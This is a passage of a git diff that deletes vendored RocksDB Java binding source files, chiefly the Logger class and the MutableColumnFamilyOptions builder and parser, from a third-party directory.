- * Java logging APIs like Log4j or Slf4j without keeping
- * database logs in the filesystem.</p>
- *
- * <strong>Performance</strong>
- * <p>There are certain performance penalties using a Java
- * {@code Logger} implementation within production code.
- * </p>
- *
- * <p>
- * A log level can be set using {@link org.rocksdb.Options} or
- * {@link Logger#setInfoLogLevel(InfoLogLevel)}. The set log level
- * influences the underlying native code. Each log message is
- * checked against the set log level and if the log level is more
- * verbose as the set log level, native allocations will be made
- * and data structures are allocated.
- * </p>
- *
- * <p>Every log message which will be emitted by native code will
- * trigger expensive native to Java transitions. So the preferred
- * setting for production use is either
- * {@link org.rocksdb.InfoLogLevel#ERROR_LEVEL} or
- * {@link org.rocksdb.InfoLogLevel#FATAL_LEVEL}.
- * </p>
- */
-public abstract class Logger extends AbstractImmutableNativeReference {
-
-  final long nativeHandle_;
-
-  /**
-   * <p>AbstractLogger constructor.</p>
-   *
-   * <p><strong>Important:</strong> the log level set within
-   * the {@link org.rocksdb.Options} instance will be used as
-   * maximum log level of RocksDB.</p>
-   *
-   * @param options {@link org.rocksdb.Options} instance.
-   */
-  public Logger(final Options options) {
-    super(true);
-    this.nativeHandle_ = createNewLoggerOptions(options.nativeHandle_);
-  }
-
-  /**
-   * <p>AbstractLogger constructor.</p>
-   *
-   * <p><strong>Important:</strong> the log level set within
-   * the {@link org.rocksdb.DBOptions} instance will be used
-   * as maximum log level of RocksDB.</p>
-   *
-   * @param dboptions {@link org.rocksdb.DBOptions} instance.
-   */
-  public Logger(final DBOptions dboptions) {
-    super(true);
-    this.nativeHandle_ = createNewLoggerDbOptions(dboptions.nativeHandle_);
-  }
-
-  /**
-   * Set {@link org.rocksdb.InfoLogLevel} to AbstractLogger.
-   *
-   * @param infoLogLevel {@link org.rocksdb.InfoLogLevel} instance.
-   */
-  public void setInfoLogLevel(final InfoLogLevel infoLogLevel) {
-      setInfoLogLevel(nativeHandle_, infoLogLevel.getValue());
-  }
-
-  /**
-   * Return the loggers log level.
-   *
-   * @return {@link org.rocksdb.InfoLogLevel} instance.
-   */
-  public InfoLogLevel infoLogLevel() {
-    return InfoLogLevel.getInfoLogLevel(
-        infoLogLevel(nativeHandle_));
-  }
-
-  protected abstract void log(InfoLogLevel infoLogLevel,
-      String logMsg);
-
-  /**
-   * Deletes underlying C++ slice pointer.
-   * Note that this function should be called only after all
-   * RocksDB instances referencing the slice are closed.
-   * Otherwise an undefined behavior will occur.
-   */
-  @Override
-  protected void disposeInternal() {
-    disposeInternal(nativeHandle_);
-  }
-
-  protected native long createNewLoggerOptions(
-      long options);
-  protected native long createNewLoggerDbOptions(
-      long dbOptions);
-  protected native void setInfoLogLevel(long handle,
-      byte infoLogLevel);
-  protected native byte infoLogLevel(long handle);
-  private native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MemTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MemTableConfig.java
deleted file mode 100644
index 83cee97..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MemTableConfig.java
+++ /dev/null
@@ -1,29 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-/**
- * MemTableConfig is used to config the internal mem-table of a RocksDB.
- * It is required for each memtable to have one such sub-class to allow
- * Java developers to use it.
- *
- * To make a RocksDB to use a specific MemTable format, its associated
- * MemTableConfig should be properly set and passed into Options
- * via Options.setMemTableFactory() and open the db using that Options.
- *
- * @see Options
- */
-public abstract class MemTableConfig {
-  /**
-   * This function should only be called by Options.setMemTableConfig(),
-   * which will create a c++ shared-pointer to the c++ MemTableRepFactory
-   * that associated with the Java MemTableConfig.
-   *
-   * @see Options#setMemTableConfig(MemTableConfig)
-   *
-   * @return native handle address to native memory table instance.
-   */
-  abstract protected long newMemTableFactoryHandle();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MergeOperator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MergeOperator.java
deleted file mode 100644
index 296527f..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MergeOperator.java
+++ /dev/null
@@ -1,17 +0,0 @@
-// Copyright (c) 2014, Vlad Balan (vlad.gm@gmail.com).  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * MergeOperator holds an operator to be applied when compacting
- * two merge operands held under the same key in order to obtain a single
- * value.
- */
-public abstract class MergeOperator extends RocksObject {
-    protected MergeOperator(final long nativeHandle) {
-        super(nativeHandle);
-    }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java
deleted file mode 100644
index 3585318..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java
+++ /dev/null
@@ -1,997 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.*;
-
-public class MutableColumnFamilyOptions {
-  private final static String KEY_VALUE_PAIR_SEPARATOR = ";";
-  private final static char KEY_VALUE_SEPARATOR = '=';
-  private final static String INT_ARRAY_INT_SEPARATOR = ",";
-
-  private final String[] keys;
-  private final String[] values;
-
-  // user must use builder pattern, or parser
-  private MutableColumnFamilyOptions(final String keys[],
-      final String values[]) {
-    this.keys = keys;
-    this.values = values;
-  }
-
-  String[] getKeys() {
-    return keys;
-  }
-
-  String[] getValues() {
-    return values;
-  }
-
-  /**
-   * Creates a builder which allows you
-   * to set MutableColumnFamilyOptions in a fluent
-   * manner
-   *
-   * @return A builder for MutableColumnFamilyOptions
-   */
-  public static MutableColumnFamilyOptionsBuilder builder() {
-    return new MutableColumnFamilyOptionsBuilder();
-  }
-
-  /**
-   * Parses a String representation of MutableColumnFamilyOptions
-   *
-   * The format is: key1=value1;key2=value2;key3=value3 etc
-   *
-   * For int[] values, each int should be separated by a comma, e.g.
-   *
-   * key1=value1;intArrayKey1=1,2,3
-   *
-   * @param str The string representation of the mutable column family options
-   *
-   * @return A builder for the mutable column family options
-   */
-  public static MutableColumnFamilyOptionsBuilder parse(final String str) {
-    Objects.requireNonNull(str);
-
-    final MutableColumnFamilyOptionsBuilder builder =
-        new MutableColumnFamilyOptionsBuilder();
-
-    final String options[] = str.trim().split(KEY_VALUE_PAIR_SEPARATOR);
-    for(final String option : options) {
-      final int equalsOffset = option.indexOf(KEY_VALUE_SEPARATOR);
-      if(equalsOffset <= 0) {
-        throw new IllegalArgumentException(
-            "options string has an invalid key=value pair");
-      }
-
-      final String key = option.substring(0, equalsOffset);
-      if(key == null || key.isEmpty()) {
-        throw new IllegalArgumentException("options string is invalid");
-      }
-
-      final String value = option.substring(equalsOffset + 1);
-      if(value == null || value.isEmpty()) {
-        throw new IllegalArgumentException("options string is invalid");
-      }
-
-      builder.fromString(key, value);
-    }
-
-    return builder;
-  }
-
-  /**
-   * Returns a string representation
-   * of MutableColumnFamilyOptions which is
-   * suitable for consumption by {@link #parse(String)}
-   *
-   * @return String representation of MutableColumnFamilyOptions
-   */
-  @Override
-  public String toString() {
-    final StringBuilder buffer = new StringBuilder();
-    for(int i = 0; i < keys.length; i++) {
-      buffer
-          .append(keys[i])
-          .append(KEY_VALUE_SEPARATOR)
-          .append(values[i]);
-
-      if(i + 1 < keys.length) {
-        buffer.append(KEY_VALUE_PAIR_SEPARATOR);
-      }
-    }
-    return buffer.toString();
-  }
-
-  public enum ValueType {
-    DOUBLE,
-    LONG,
-    INT,
-    BOOLEAN,
-    INT_ARRAY,
-    ENUM
-  }
-
-  public enum MemtableOption implements MutableColumnFamilyOptionKey {
-    write_buffer_size(ValueType.LONG),
-    arena_block_size(ValueType.LONG),
-    memtable_prefix_bloom_size_ratio(ValueType.DOUBLE),
-    @Deprecated memtable_prefix_bloom_bits(ValueType.INT),
-    @Deprecated memtable_prefix_bloom_probes(ValueType.INT),
-    memtable_huge_page_size(ValueType.LONG),
-    max_successive_merges(ValueType.LONG),
-    @Deprecated filter_deletes(ValueType.BOOLEAN),
-    max_write_buffer_number(ValueType.INT),
-    inplace_update_num_locks(ValueType.LONG);
-
-    private final ValueType valueType;
-    MemtableOption(final ValueType valueType) {
-      this.valueType = valueType;
-    }
-
-    @Override
-    public ValueType getValueType() {
-      return valueType;
-    }
-  }
-
-  public enum CompactionOption implements MutableColumnFamilyOptionKey {
-    disable_auto_compactions(ValueType.BOOLEAN),
-    @Deprecated soft_rate_limit(ValueType.DOUBLE),
-    soft_pending_compaction_bytes_limit(ValueType.LONG),
-    @Deprecated hard_rate_limit(ValueType.DOUBLE),
-    hard_pending_compaction_bytes_limit(ValueType.LONG),
-    level0_file_num_compaction_trigger(ValueType.INT),
-    level0_slowdown_writes_trigger(ValueType.INT),
-    level0_stop_writes_trigger(ValueType.INT),
-    max_compaction_bytes(ValueType.LONG),
-    target_file_size_base(ValueType.LONG),
-    target_file_size_multiplier(ValueType.INT),
-    max_bytes_for_level_base(ValueType.LONG),
-    max_bytes_for_level_multiplier(ValueType.INT),
-    max_bytes_for_level_multiplier_additional(ValueType.INT_ARRAY);
-
-    private final ValueType valueType;
-    CompactionOption(final ValueType valueType) {
-      this.valueType = valueType;
-    }
-
-    @Override
-    public ValueType getValueType() {
-      return valueType;
-    }
-  }
-
-  public enum MiscOption implements MutableColumnFamilyOptionKey {
-    max_sequential_skip_in_iterations(ValueType.LONG),
-    paranoid_file_checks(ValueType.BOOLEAN),
-    report_bg_io_stats(ValueType.BOOLEAN),
-    compression_type(ValueType.ENUM);
-
-    private final ValueType valueType;
-    MiscOption(final ValueType valueType) {
-      this.valueType = valueType;
-    }
-
-    @Override
-    public ValueType getValueType() {
-      return valueType;
-    }
-  }
-
-  private interface MutableColumnFamilyOptionKey {
-    String name();
-    ValueType getValueType();
-  }
-
-  private static abstract class MutableColumnFamilyOptionValue<T> {
-    protected final T value;
-
-    MutableColumnFamilyOptionValue(final T value) {
-      this.value = value;
-    }
-
-    abstract double asDouble() throws NumberFormatException;
-    abstract long asLong() throws NumberFormatException;
-    abstract int asInt() throws NumberFormatException;
-    abstract boolean asBoolean() throws IllegalStateException;
-    abstract int[] asIntArray() throws IllegalStateException;
-    abstract String asString();
-    abstract T asObject();
-  }
-
-  private static class MutableColumnFamilyOptionStringValue
-      extends MutableColumnFamilyOptionValue<String> {
-    MutableColumnFamilyOptionStringValue(final String value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() throws NumberFormatException {
-      return Double.parseDouble(value);
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      return Long.parseLong(value);
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      return Integer.parseInt(value);
-    }
-
-    @Override
-    boolean asBoolean() throws IllegalStateException {
-      return Boolean.parseBoolean(value);
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      throw new IllegalStateException("String is not applicable as int[]");
-    }
-
-    @Override
-    String asString() {
-      return value;
-    }
-
-    @Override
-    String asObject() {
-      return value;
-    }
-  }
-
-  private static class MutableColumnFamilyOptionDoubleValue
-      extends MutableColumnFamilyOptionValue<Double> {
-    MutableColumnFamilyOptionDoubleValue(final double value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() {
-      return value;
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      return value.longValue();
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      if(value > Integer.MAX_VALUE || value < Integer.MIN_VALUE) {
-        throw new NumberFormatException(
-            "double value lies outside the bounds of int");
-      }
-      return value.intValue();
-    }
-
-    @Override
-    boolean asBoolean() throws IllegalStateException {
-      throw new IllegalStateException(
-          "double is not applicable as boolean");
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      if(value > Integer.MAX_VALUE || value < Integer.MIN_VALUE) {
-        throw new NumberFormatException(
-            "double value lies outside the bounds of int");
-      }
-      return new int[] { value.intValue() };
-    }
-
-    @Override
-    String asString() {
-      return Double.toString(value);
-    }
-
-    @Override
-    Double asObject() {
-      return value;
-    }
-  }
-
-  private static class MutableColumnFamilyOptionLongValue
-      extends MutableColumnFamilyOptionValue<Long> {
-    MutableColumnFamilyOptionLongValue(final long value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() {
-      if(value > Double.MAX_VALUE || value < Double.MIN_VALUE) {
-        throw new NumberFormatException(
-            "long value lies outside the bounds of int");
-      }
-      return value.doubleValue();
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      return value;
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      if(value > Integer.MAX_VALUE || value < Integer.MIN_VALUE) {
-        throw new NumberFormatException(
-            "long value lies outside the bounds of int");
-      }
-      return value.intValue();
-    }
-
-    @Override
-    boolean asBoolean() throws IllegalStateException {
-      throw new IllegalStateException(
-          "long is not applicable as boolean");
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      if(value > Integer.MAX_VALUE || value < Integer.MIN_VALUE) {
-        throw new NumberFormatException(
-            "long value lies outside the bounds of int");
-      }
-      return new int[] { value.intValue() };
-    }
-
-    @Override
-    String asString() {
-      return Long.toString(value);
-    }
-
-    @Override
-    Long asObject() {
-      return value;
-    }
-  }
-
-  private static class MutableColumnFamilyOptionIntValue
-      extends MutableColumnFamilyOptionValue<Integer> {
-    MutableColumnFamilyOptionIntValue(final int value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() {
-      if(value > Double.MAX_VALUE || value < Double.MIN_VALUE) {
-        throw new NumberFormatException("int value lies outside the bounds of int");
-      }
-      return value.doubleValue();
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      return value;
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      return value;
-    }
-
-    @Override
-    boolean asBoolean() throws IllegalStateException {
-      throw new IllegalStateException("int is not applicable as boolean");
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      return new int[] { value };
-    }
-
-    @Override
-    String asString() {
-      return Integer.toString(value);
-    }
-
-    @Override
-    Integer asObject() {
-      return value;
-    }
-  }
-
-  private static class MutableColumnFamilyOptionBooleanValue
-      extends MutableColumnFamilyOptionValue<Boolean> {
-    MutableColumnFamilyOptionBooleanValue(final boolean value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() {
-      throw new NumberFormatException("boolean is not applicable as double");
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      throw new NumberFormatException("boolean is not applicable as Long");
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      throw new NumberFormatException("boolean is not applicable as int");
-    }
-
-    @Override
-    boolean asBoolean() {
-      return value;
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      throw new IllegalStateException("boolean is not applicable as int[]");
-    }
-
-    @Override
-    String asString() {
-      return Boolean.toString(value);
-    }
-
-    @Override
-    Boolean asObject() {
-      return value;
-    }
-  }
-
-  private static class MutableColumnFamilyOptionIntArrayValue
-      extends MutableColumnFamilyOptionValue<int[]> {
-    MutableColumnFamilyOptionIntArrayValue(final int[] value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() {
-      throw new NumberFormatException("int[] is not applicable as double");
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      throw new NumberFormatException("int[] is not applicable as Long");
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      throw new NumberFormatException("int[] is not applicable as int");
-    }
-
-    @Override
-    boolean asBoolean() {
-      throw new NumberFormatException("int[] is not applicable as boolean");
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      return value;
-    }
-
-    @Override
-    String asString() {
-      final StringBuilder builder = new StringBuilder();
-      for(int i = 0; i < value.length; i++) {
-        builder.append(Integer.toString(i));
-        if(i + 1 < value.length) {
-          builder.append(INT_ARRAY_INT_SEPARATOR);
-        }
-      }
-      return builder.toString();
-    }
-
-    @Override
-    int[] asObject() {
-      return value;
-    }
-  }
-
-  private static class MutableColumnFamilyOptionEnumValue<T extends Enum<T>>
-      extends MutableColumnFamilyOptionValue<T> {
-
-    MutableColumnFamilyOptionEnumValue(final T value) {
-      super(value);
-    }
-
-    @Override
-    double asDouble() throws NumberFormatException {
-      throw new NumberFormatException("Enum is not applicable as double");
-    }
-
-    @Override
-    long asLong() throws NumberFormatException {
-      throw new NumberFormatException("Enum is not applicable as long");
-    }
-
-    @Override
-    int asInt() throws NumberFormatException {
-      throw new NumberFormatException("Enum is not applicable as int");
-    }
-
-    @Override
-    boolean asBoolean() throws IllegalStateException {
-      throw new NumberFormatException("Enum is not applicable as boolean");
-    }
-
-    @Override
-    int[] asIntArray() throws IllegalStateException {
-      throw new NumberFormatException("Enum is not applicable as int[]");
-    }
-
-    @Override
-    String asString() {
-      return value.name();
-    }
-
-    @Override
-    T asObject() {
-      return value;
-    }
-  }
-
-  public static class MutableColumnFamilyOptionsBuilder
-      implements MutableColumnFamilyOptionsInterface {
-
-    private final static Map<String, MutableColumnFamilyOptionKey> ALL_KEYS_LOOKUP = new HashMap<>();
-    static {
-      for(final MutableColumnFamilyOptionKey key : MemtableOption.values()) {
-        ALL_KEYS_LOOKUP.put(key.name(), key);
-      }
-
-      for(final MutableColumnFamilyOptionKey key : CompactionOption.values()) {
-        ALL_KEYS_LOOKUP.put(key.name(), key);
-      }
-
-      for(final MutableColumnFamilyOptionKey key : MiscOption.values()) {
-        ALL_KEYS_LOOKUP.put(key.name(), key);
-      }
-    }
-
-    private final Map<MutableColumnFamilyOptionKey, MutableColumnFamilyOptionValue<?>> options = new LinkedHashMap<>();
-
-    public MutableColumnFamilyOptions build() {
-      final String keys[] = new String[options.size()];
-      final String values[] = new String[options.size()];
-
-      int i = 0;
-      for(final Map.Entry<MutableColumnFamilyOptionKey, MutableColumnFamilyOptionValue<?>> option : options.entrySet()) {
-        keys[i] = option.getKey().name();
-        values[i] = option.getValue().asString();
-        i++;
-      }
-
-      return new MutableColumnFamilyOptions(keys, values);
-    }
-
-    private MutableColumnFamilyOptionsBuilder setDouble(
-        final MutableColumnFamilyOptionKey key, final double value) {
-      if(key.getValueType() != ValueType.DOUBLE) {
-        throw new IllegalArgumentException(
-            key + " does not accept a double value");
-      }
-      options.put(key, new MutableColumnFamilyOptionDoubleValue(value));
-      return this;
-    }
-
-    private double getDouble(final MutableColumnFamilyOptionKey key)
-        throws NoSuchElementException, NumberFormatException {
-      final MutableColumnFamilyOptionValue<?> value = options.get(key);
-      if(value == null) {
-        throw new NoSuchElementException(key.name() + " has not been set");
-      }
-      return value.asDouble();
-    }
-
-    private MutableColumnFamilyOptionsBuilder setLong(
-        final MutableColumnFamilyOptionKey key, final long value) {
-      if(key.getValueType() != ValueType.LONG) {
-        throw new IllegalArgumentException(
-            key + " does not accept a long value");
-      }
-      options.put(key, new MutableColumnFamilyOptionLongValue(value));
-      return this;
-    }
-
-    private long getLong(final MutableColumnFamilyOptionKey key)
-        throws NoSuchElementException, NumberFormatException {
-      final MutableColumnFamilyOptionValue<?> value = options.get(key);
-      if(value == null) {
-        throw new NoSuchElementException(key.name() + " has not been set");
-      }
-      return value.asLong();
-    }
-
-    private MutableColumnFamilyOptionsBuilder setInt(
-        final MutableColumnFamilyOptionKey key, final int value) {
-      if(key.getValueType() != ValueType.INT) {
-        throw new IllegalArgumentException(
-            key + " does not accept an integer value");
-      }
-      options.put(key, new MutableColumnFamilyOptionIntValue(value));
-      return this;
-    }
-
-    private int getInt(final MutableColumnFamilyOptionKey key)
-        throws NoSuchElementException, NumberFormatException {
-      final MutableColumnFamilyOptionValue<?> value = options.get(key);
-      if(value == null) {
-        throw new NoSuchElementException(key.name() + " has not been set");
-      }
-      return value.asInt();
-    }
-
-    private MutableColumnFamilyOptionsBuilder setBoolean(
-        final MutableColumnFamilyOptionKey key, final boolean value) {
-      if(key.getValueType() != ValueType.BOOLEAN) {
-        throw new IllegalArgumentException(
-            key + " does not accept a boolean value");
-      }
-      options.put(key, new MutableColumnFamilyOptionBooleanValue(value));
-      return this;
-    }
-
-    private boolean getBoolean(final MutableColumnFamilyOptionKey key)
-        throws NoSuchElementException, NumberFormatException {
-      final MutableColumnFamilyOptionValue<?> value = options.get(key);
-      if(value == null) {
-        throw new NoSuchElementException(key.name() + " has not been set");
-      }
-      return value.asBoolean();
-    }
-
-    private MutableColumnFamilyOptionsBuilder setIntArray(
-        final MutableColumnFamilyOptionKey key, final int[] value) {
-      if(key.getValueType() != ValueType.INT_ARRAY) {
-        throw new IllegalArgumentException(
-            key + " does not accept an int array value");
-      }
-      options.put(key, new MutableColumnFamilyOptionIntArrayValue(value));
-      return this;
-    }
-
-    private int[] getIntArray(final MutableColumnFamilyOptionKey key)
-        throws NoSuchElementException, NumberFormatException {
-      final MutableColumnFamilyOptionValue<?> value = options.get(key);
-      if(value == null) {
-        throw new NoSuchElementException(key.name() + " has not been set");
-      }
-      return value.asIntArray();
-    }
-
-    private <T extends Enum<T>> MutableColumnFamilyOptionsBuilder setEnum(
-        final MutableColumnFamilyOptionKey key, final T value) {
-      if(key.getValueType() != ValueType.ENUM) {
-        throw new IllegalArgumentException(
-            key + " does not accept a Enum value");
-      }
-      options.put(key, new MutableColumnFamilyOptionEnumValue<T>(value));
-      return this;
-
-    }
-
-    private <T extends Enum<T>> T getEnum(final MutableColumnFamilyOptionKey key)
-        throws NoSuchElementException, NumberFormatException {
-      final MutableColumnFamilyOptionValue<?> value = options.get(key);
-      if(value == null) {
-        throw new NoSuchElementException(key.name() + " has not been set");
-      }
-
-      if(!(value instanceof MutableColumnFamilyOptionEnumValue)) {
-        throw new NoSuchElementException(key.name() + " is not of Enum type");
-      }
-
-      return ((MutableColumnFamilyOptionEnumValue<T>)value).asObject();
-    }
-
-    public MutableColumnFamilyOptionsBuilder fromString(final String keyStr,
-        final String valueStr) throws IllegalArgumentException {
-      Objects.requireNonNull(keyStr);
-      Objects.requireNonNull(valueStr);
-
-      final MutableColumnFamilyOptionKey key = ALL_KEYS_LOOKUP.get(keyStr);
-      switch(key.getValueType()) {
-        case DOUBLE:
-          return setDouble(key, Double.parseDouble(valueStr));
-
-        case LONG:
-          return setLong(key, Long.parseLong(valueStr));
-
-        case INT:
-          return setInt(key, Integer.parseInt(valueStr));
-
-        case BOOLEAN:
-          return setBoolean(key, Boolean.parseBoolean(valueStr));
-
-        case INT_ARRAY:
-          final String[] strInts = valueStr
-              .trim().split(INT_ARRAY_INT_SEPARATOR);
-          if(strInts == null || strInts.length == 0) {
-            throw new IllegalArgumentException(
-                "int array value is not correctly formatted");
-          }
-
-          final int value[] = new int[strInts.length];
-          int i = 0;
-          for(final String strInt : strInts) {
-            value[i++] = Integer.parseInt(strInt);
-          }
-          return setIntArray(key, value);
-      }
-
-      throw new IllegalStateException(
-          key + " has unknown value type: " + key.getValueType());
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setWriteBufferSize(
-        final long writeBufferSize) {
-      return setLong(MemtableOption.write_buffer_size, writeBufferSize);
-    }
-
-    @Override
-    public long writeBufferSize() {
-      return getLong(MemtableOption.write_buffer_size);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setArenaBlockSize(
-        final long arenaBlockSize) {
-      return setLong(MemtableOption.arena_block_size, arenaBlockSize);
-    }
-
-    @Override
-    public long arenaBlockSize() {
-      return getLong(MemtableOption.arena_block_size);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMemtablePrefixBloomSizeRatio(
-        final double memtablePrefixBloomSizeRatio) {
-      return setDouble(MemtableOption.memtable_prefix_bloom_size_ratio,
-          memtablePrefixBloomSizeRatio);
-    }
-
-    @Override
-    public double memtablePrefixBloomSizeRatio() {
-      return getDouble(MemtableOption.memtable_prefix_bloom_size_ratio);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMemtableHugePageSize(
-        final long memtableHugePageSize) {
-      return setLong(MemtableOption.memtable_huge_page_size,
-          memtableHugePageSize);
-    }
-
-    @Override
-    public long memtableHugePageSize() {
-      return getLong(MemtableOption.memtable_huge_page_size);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxSuccessiveMerges(
-        final long maxSuccessiveMerges) {
-      return setLong(MemtableOption.max_successive_merges, maxSuccessiveMerges);
-    }
-
-    @Override
-    public long maxSuccessiveMerges() {
-      return getLong(MemtableOption.max_successive_merges);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxWriteBufferNumber(
-        final int maxWriteBufferNumber) {
-      return setInt(MemtableOption.max_write_buffer_number,
-          maxWriteBufferNumber);
-    }
-
-    @Override
-    public int maxWriteBufferNumber() {
-      return getInt(MemtableOption.max_write_buffer_number);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setInplaceUpdateNumLocks(
-        final long inplaceUpdateNumLocks) {
-      return setLong(MemtableOption.inplace_update_num_locks,
-          inplaceUpdateNumLocks);
-    }
-
-    @Override
-    public long inplaceUpdateNumLocks() {
-      return getLong(MemtableOption.inplace_update_num_locks);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setDisableAutoCompactions(
-        final boolean disableAutoCompactions) {
-      return setBoolean(CompactionOption.disable_auto_compactions,
-          disableAutoCompactions);
-    }
-
-    @Override
-    public boolean disableAutoCompactions() {
-      return getBoolean(CompactionOption.disable_auto_compactions);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setSoftPendingCompactionBytesLimit(
-        final long softPendingCompactionBytesLimit) {
-      return setLong(CompactionOption.soft_pending_compaction_bytes_limit,
-          softPendingCompactionBytesLimit);
-    }
-
-    @Override
-    public long softPendingCompactionBytesLimit() {
-      return getLong(CompactionOption.soft_pending_compaction_bytes_limit);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setHardPendingCompactionBytesLimit(
-        final long hardPendingCompactionBytesLimit) {
-      return setLong(CompactionOption.hard_pending_compaction_bytes_limit,
-          hardPendingCompactionBytesLimit);
-    }
-
-    @Override
-    public long hardPendingCompactionBytesLimit() {
-      return getLong(CompactionOption.hard_pending_compaction_bytes_limit);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setLevel0FileNumCompactionTrigger(
-        final int level0FileNumCompactionTrigger) {
-      return setInt(CompactionOption.level0_file_num_compaction_trigger,
-          level0FileNumCompactionTrigger);
-    }
-
-    @Override
-    public int level0FileNumCompactionTrigger() {
-      return getInt(CompactionOption.level0_file_num_compaction_trigger);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setLevel0SlowdownWritesTrigger(
-        final int level0SlowdownWritesTrigger) {
-      return setInt(CompactionOption.level0_slowdown_writes_trigger,
-          level0SlowdownWritesTrigger);
-    }
-
-    @Override
-    public int level0SlowdownWritesTrigger() {
-      return getInt(CompactionOption.level0_slowdown_writes_trigger);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setLevel0StopWritesTrigger(
-        final int level0StopWritesTrigger) {
-      return setInt(CompactionOption.level0_stop_writes_trigger,
-          level0StopWritesTrigger);
-    }
-
-    @Override
-    public int level0StopWritesTrigger() {
-      return getInt(CompactionOption.level0_stop_writes_trigger);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxCompactionBytes(final long maxCompactionBytes) {
-      return setLong(CompactionOption.max_compaction_bytes, maxCompactionBytes);
-    }
-
-    @Override
-    public long maxCompactionBytes() {
-      return getLong(CompactionOption.max_compaction_bytes);
-    }
-
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setTargetFileSizeBase(
-        final long targetFileSizeBase) {
-      return setLong(CompactionOption.target_file_size_base,
-          targetFileSizeBase);
-    }
-
-    @Override
-    public long targetFileSizeBase() {
-      return getLong(CompactionOption.target_file_size_base);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setTargetFileSizeMultiplier(
-        final int targetFileSizeMultiplier) {
-      return setInt(CompactionOption.target_file_size_multiplier,
-          targetFileSizeMultiplier);
-    }
-
-    @Override
-    public int targetFileSizeMultiplier() {
-      return getInt(CompactionOption.target_file_size_multiplier);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxBytesForLevelBase(
-        final long maxBytesForLevelBase) {
-      return setLong(CompactionOption.max_bytes_for_level_base,
-          maxBytesForLevelBase);
-    }
-
-    @Override
-    public long maxBytesForLevelBase() {
-      return getLong(CompactionOption.max_bytes_for_level_base);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxBytesForLevelMultiplier(
-        final double maxBytesForLevelMultiplier) {
-      return setDouble(CompactionOption.max_bytes_for_level_multiplier, maxBytesForLevelMultiplier);
-    }
-
-    @Override
-    public double maxBytesForLevelMultiplier() {
-      return getDouble(CompactionOption.max_bytes_for_level_multiplier);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxBytesForLevelMultiplierAdditional(
-        final int[] maxBytesForLevelMultiplierAdditional) {
-      return setIntArray(
-          CompactionOption.max_bytes_for_level_multiplier_additional,
-          maxBytesForLevelMultiplierAdditional);
-    }
-
-    @Override
-    public int[] maxBytesForLevelMultiplierAdditional() {
-      return getIntArray(
-          CompactionOption.max_bytes_for_level_multiplier_additional);
-    }
-
-    @Override
-    public MutableColumnFamilyOptionsBuilder setMaxSequentialSkipInIterations(
